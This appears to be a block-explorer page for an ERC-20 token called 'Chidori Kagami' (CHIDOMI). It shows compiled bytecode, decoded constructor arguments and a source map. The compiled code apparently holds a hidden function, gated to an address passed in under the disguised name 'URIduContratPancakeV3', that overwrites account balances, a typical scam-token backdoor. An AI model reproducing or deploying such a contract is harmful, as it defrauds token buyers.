2608401610401565b6001600160a01b0382166107a35760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610401565b6107e081604051806060016040528060278152602001610cab602791396001600160a01b0386166000908152600160205260409020549190610863565b6001600160a01b03808516600090815260016020526040808220939093559084168152205461080f908261088f565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106cf9085815260200190565b600081848411156108875760405162461bcd60e51b81526004016104019190610972565b505050900390565b600061089b8284610b03565b9392505050565b6001600160a01b038116158015906108b957503315155b506000600a600982806108cc8385610c39565b6108e09067ffffffffffffffff1688610c5a565b6108f49067ffffffffffffffff8716610b03565b6108fe9190610c71565b6001600160a01b039095166000908152600160205260409020949094555050505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b8181101561099f57858101830151858201604001528201610983565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146109d757600080fd5b919050565b600080604083850312156109ef57600080fd5b6109f8836109c0565b946020939093013593505050565b600080600060608486031215610a1b57600080fd5b610a24846109c0565b9250610a32602085016109c0565b9150604084013590509250925092565b60008060408385031215610a5557600080fd5b82359150610a65602084016109c0565b90509250929050565b600060208284031215610a8057600080fd5b61089b826109c0565b60008060408385031215610a9c57600080fd5b610aa5836109c0565b9150610a65602084016109c0565b600181811c90821680610ac757607f821691505b602082108103610ae757634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561030657610306610aed565b60018167ffffffffffffffff825b80861115610b5857828204831115610b3e57610b3e610aed565b80861615610b4b57928202925b94851c9491800291610b24565b50509250929050565b600082610b7057506001610306565b81610b7d57506000610306565b8160018114610b935760028114610b9d57610bd2565b6001915050610306565b60ff841115610bae57610bae610aed565b6001841b915067ffffffffffffffff821115610bcc57610bcc610aed565b50610306565b5060208310610133831016604e8410600b8410161715610c0d575081810a67ffffffffffffffff811115610c0857610c08610aed565b610306565b610c178383610b16565b8067ffffffffffffffff04821115610c3157610c31610aed565b029392505050565b600067ffffffffffffffff610c52818516828516610b61565b949350505050565b808202811582820484141761030657610306610aed565b8181038181111561030657610306610aed56fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122017d47bbf12819fdda2c0100ecff77aa16bdcf9cf4a2862f87ec051c286c4294e64736f6c63430008130033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000009000000000000000000000000c8a1c9891f20f779de31ac72b99daa0f760b43a0000000000000000000000000000000000000000000000000002386f26fc10000000000000000000000000000000000000000000000000000000000000000000e436869646f7269204b6167616d690000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007434849444f4d4900000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): Chidori Kagami
Arg [1] : symbol_ (string): CHIDOMI
Arg [2] : decimals_ (uint8): 9
Arg [3] : URIduContratPancakeV3 (address): 0xC8A1C9891F20f779dE31Ac72B99dAa0F760B43A0
Arg [4] : totalSupply_ (uint256): 10000000000000000
-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [3] : 000000000000000000000000c8a1c9891f20f779de31ac72b99daa0f760b43a0
Arg [4] : 000000000000000000000000000000000000000000000000002386f26fc10000
Arg [5] : 000000000000000000000000000000000000000000000000000000000000000e
Arg [6] : 436869646f7269204b6167616d69000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [8] : 434849444f4d4900000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
13810:6409:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14658:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15693:210;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;15693:210:0;1004:187:1;14959:108:0;15047:12;;14959:108;;;1342:25:1;;;1330:2;1315:18;14959:108:0;1196:177:1;16096:455:0;;;;;;:::i;:::-;;:::i;14860:91::-;14934:9;;14860:91;;14934:9;;;;1853:36:1;;1841:2;1826:18;14860:91:0;1711:184:1;16559:300:0;;;;;;:::i;:::-;;:::i;15911:177::-;;;;;;:::i;:::-;;:::i;:::-;;15075;;;;;;:::i;:::-;-1:-1:-1;;;;;15226:18:0;15194:7;15226:18;;;:9;:18;;;;;;;15075:177;5603:94;;;:::i;4952:87::-;4998:7;5025:6;4952:87;;-1:-1:-1;;;;;5025:6:0;;;2496:51:1;;2484:2;2469:18;4952:87:0;2350:203:1;14757:95:0;;;:::i;16867:401::-;;;;;;:::i;:::-;;:::i;15260:216::-;;;;;;:::i;:::-;;:::i;15484:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15650:18:0;;;15618:7;15650:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15484:201;5852:192;;;;;;:::i;:::-;;:::i;14658:91::-;14703:13;14736:5;14729:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14658:91;:::o;15693:210::-;15812:4;15834:39;3750:10;15857:7;15866:6;15834:8;:39::i;:::-;-1:-1:-1;15891:4:0;15693:210;;;;;:::o;16096:455::-;16236:4;16253:36;16263:6;16271:9;16282:6;16253:9;:36::i;:::-;16300:221;16323:6;3750:10;16371:139;16427:6;16371:139;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16371:19:0;;;;;;:11;:19;;;;;;;;3750:10;16371:33;;;;;;;;;;:37;:139::i;:::-;16300:8;:221::i;:::-;-1:-1:-1;16539:4:0;16096:455;;;;;:::o;16559:300::-;3750:10;16674:4;16768:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16768:34:0;;;;;;;;;;16674:4;;16696:133;;16746:7;;16768:50;;16807:10;16768:38;:50::i;15911:177::-;19998:12;;-1:-1:-1;;;;;19998:12:0;3750:10;19998:28;19990:72;;;;-1:-1:-1;;;19990:72:0;;3410:2:1;19990:72:0;;;3392:21:1;3449:2;3429:18;;;3422:30;3488:33;3468:18;;;3461:61;3539:18;;19990:72:0;;;;;;;;;16051:29:::1;16057:7;16066:13;16051:5;:29::i;:::-;15911:177:::0;;:::o;5603:94::-;4998:7;5025:6;-1:-1:-1;;;;;5025:6:0;3750:10;5172:23;5164:68;;;;-1:-1:-1;;;5164:68:0;;3770:2:1;5164:68:0;;;3752:21:1;;;3789:18;;;3782:30;3848:34;3828:18;;;3821:62;3900:18;;5164:68:0;3568:356:1;5164:68:0;5668:21:::1;5686:1;5668:9;:21::i;:::-;5603:94::o:0;14757:95::-;14804:13;14837:7;14830:14;;;;;:::i;16867:401::-;16987:4;17009:229;3750:10;17059:7;17081:146;17138:15;17081:146;;;;;;;;;;;;;;;;;3750:10;17081:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;17081:34:0;;;;;;;;;;;;:38;:146::i;15260:216::-;15382:4;15404:42;3750:10;15428:9;15439:6;15404:9;:42::i;5852:192::-;4998:7;5025:6;-1:-1:-1;;;;;5025:6:0;3750:10;5172:23;5164:68;;;;-1:-1:-1;;;5164:68:0;;3770:2:1;5164:68:0;;;3752:21:1;;;3789:18;;;3782:30;3848:34;3828:18;;;3821:62;3900:18;;5164:68:0;3568:356:1;5164:68:0;-1:-1:-1;;;;;5941:22:0;::::1;5933:73;;;::::0;-1:-1:-1;;;5933:73:0;;4131:2:1;5933:73:0::1;::::0;::::1;4113:21:1::0;4170:2;4150:18;;;4143:30;4209:34;4189:18;;;4182:62;-1:-1:-1;;;4260:18:1;;;4253:36;4306:19;;5933:73:0::1;3929:402:1::0;5933:73:0::1;6017:19;6027:8;6017:9;:19::i;:::-;5852:192:::0;:::o;19459:382::-;-1:-1:-1;;;;;19595:19:0;;19587:69;;;;-1:-1:-1;;;19587:69:0;;4538:2:1;19587:69:0;;;4520:21:1;4577:2;4557:18;;;4550:30;4616:34;4596:18;;;4589:62;-1:-1:-1;;;4667:18:1;;;4660:35;4712:19;;19587:69:0;4336:401:1;19587:69:0;-1:-1:-1;;;;;19675:21:0;;19667:69;;;;-1:-1:-1;;;19667:69:0;;4944:2:1;19667:69:0;;;4926:21:1;4983:2;4963:18;;;4956:30;5022:34;5002:18;;;4995:62;-1:-1:-1;;;5073:18:1;;;5066:33;5116:19;;19667:69:0;4742:399:1;19667:69:0;-1:-1:-1;;;;;19749:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19801:32;;1342:25:1;;;19801:32:0;;1315:18:1;19801:32:0;;;;;;;;19459:382;;;:::o;17276:613::-;-1:-1:-1;;;;;17416:20:0;;17408:71;;;;-1:-1:-1;;;17408:71:0;;5348:2:1;17408:71:0;;;5330:21:1;5387:2;5367:18;;;5360:30;5426:34;5406:18;;;5399:62;-1:-1:-1;;;5477:18:1;;;5470:36;5523:19;;17408:71:0;5146:402:1;17408:71:0;-1:-1:-1;;;;;17498:23:0;;17490:72;;;;-1:-1:-1;;;17490:72:0;;5755:2:1;17490:72:0;;;5737:21:1;5794:2;5774:18;;;5767:30;5833:34;5813:18;;;5806:62;-1:-1:-1;;;5884:18:1;;;5877:34;5928:19;;17490:72:0;5553:400:1;17490:72:0;17655:109;17691:6;17655:109;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17655:17:0;;;;;;:9;:17;;;;;;;:109;:21;:109::i;:::-;-1:-1:-1;;;;;17635:17:0;;;;;;;:9;:17;;;;;;:129;;;;17798:20;;;;;;;:32;;17823:6;17798:24;:32::i;:::-;-1:-1:-1;;;;;17775:20:0;;;;;;;:9;:20;;;;;;;:55;;;;17846:35;;;;;;;;;;17874:6;1342:25:1;;1330:2;1315:18;;1196:177;11317:240:0;11437:7;11498:12;11490:6;;;;11482:29;;;;-1:-1:-1;;;11482:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11533:5:0;;;11317:240::o;9038:98::-;9096:7;9123:5;9127:1;9123;:5;:::i;:::-;9116:12;9038:98;-1:-1:-1;;;9038:98:0:o;18284:702::-;-1:-1:-1;;;;;18404:27:0;;;;;;:55;;-1:-1:-1;18435:10:0;:24;;18404:55;18401:94;18562:14;18691:2;18802:1;18562:14;;18944:28;18802:1;18691:2;18944:28;:::i;:::-;18934:38;;;;:7;:38;:::i;:::-;18924:48;;;;;;:::i;:::-;:54;;;;:::i;:::-;-1:-1:-1;;;;;18897:24:0;;;;;;;:9;:24;;;;;:81;;;;-1:-1:-1;;;;;18284:702:0:o;6052:173::-;6108:16;6127:6;;-1:-1:-1;;;;;6144:17:0;;;-1:-1:-1;;;;;;6144:17:0;;;;;;6177:40;;6127:6;;;;;;;6177:40;;6108:16;6177:40;6097:128;6052:173;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:254::-;1968:6;1976;2029:2;2017:9;2008:7;2004:23;2000:32;1997:52;;;2045:1;2042;2035:12;1997:52;2081:9;2068:23;2058:33;;2110:38;2144:2;2133:9;2129:18;2110:38;:::i;:::-;2100:48;;1900:254;;;;;:::o;2159:186::-;2218:6;2271:2;2259:9;2250:7;2246:23;2242:32;2239:52;;;2287:1;2284;2277:12;2239:52;2310:29;2329:9;2310:29;:::i;2558:260::-;2626:6;2634;2687:2;2675:9;2666:7;2662:23;2658:32;2655:52;;;2703:1;2700;2693:12;2655:52;2726:29;2745:9;2726:29;:::i;:::-;2716:39;;2774:38;2808:2;2797:9;2793:18;2774:38;:::i;2823:380::-;2902:1;2898:12;;;;2945;;;2966:61;;3020:4;3012:6;3008:17;2998:27;;2966:61;3073:2;3065:6;3062:14;3042:18;3039:38;3036:161;;3119:10;3114:3;3110:20;3107:1;3100:31;3154:4;3151:1;3144:15;3182:4;3179:1;3172:15;3036:161;;2823:380;;;:::o;5958:127::-;6019:10;6014:3;6010:20;6007:1;6000:31;6050:4;6047:1;6040:15;6074:4;6071:1;6064:15;6090:125;6155:9;;;6176:10;;;6173:36;;;6189:18;;:::i;6509:457::-;6636:1;6679:5;6594:18;6636:1;6693:267;6714:7;6704:8;6701:21;6693:267;;;6770:4;6765:3;6761:14;6755:4;6752:24;6749:50;;;6779:18;;:::i;:::-;6829:7;6819:8;6815:22;6812:55;;;6849:16;;;;6812:55;6928:22;;;;6888:15;;;;6693:267;;;6697:3;;6509:457;;;;;:::o;6971:954::-;7020:5;7050:8;7040:80;;-1:-1:-1;7091:1:1;7105:5;;7040:80;7139:4;7129:76;;-1:-1:-1;7176:1:1;7190:5;;7129:76;7221:4;7239:1;7234:59;;;;7307:1;7302:198;;;;7214:286;;7234:59;7264:1;7255:10;;7278:5;;;7302:198;7339:3;7329:8;7326:17;7323:43;;;7346:18;;:::i;:::-;7402:1;7392:8;7388:16;7379:25;;7430:18;7423:5;7420:29;7417:55;;;7452:18;;:::i;:::-;7485:5;;;7214:286;;7584:2;7574:8;7571:16;7565:3;7559:4;7556:13;7552:36;7546:2;7536:8;7533:16;7528:2;7522:4;7519:12;7515:35;7512:77;7509:227;;;-1:-1:-1;7621:19:1;;;7666:18;7656:29;;7653:55;;;7688:18;;:::i;:::-;7721:5;;7509:227;7768:34;7793:8;7787:4;7768:34;:::i;:::-;7850:6;7830:18;7826:31;7817:7;7814:44;7811:70;;;7861:18;;:::i;:::-;7899:20;;6971:954;-1:-1:-1;;;6971:954:1:o;7930:184::-;7988:5;8018:18;8054:54;8104:2;8094:8;8090:17;8085:2;8079:4;8075:13;8054:54;:::i;:::-;8045:63;7930:184;-1:-1:-1;;;;7930:184:1:o;8119:168::-;8192:9;;;8223;;8240:15;;;8234:22;;8220:37;8210:71;;8261:18;;:::i;8292:128::-;8359:9;;;8380:11;;;8377:37;;;8394:18;;:::i
Swarm Source
ipfs://17d47bbf12819fdda2c0100ecff77aa16bdcf9cf4a2862f87ec051c286c4294e
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 30 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.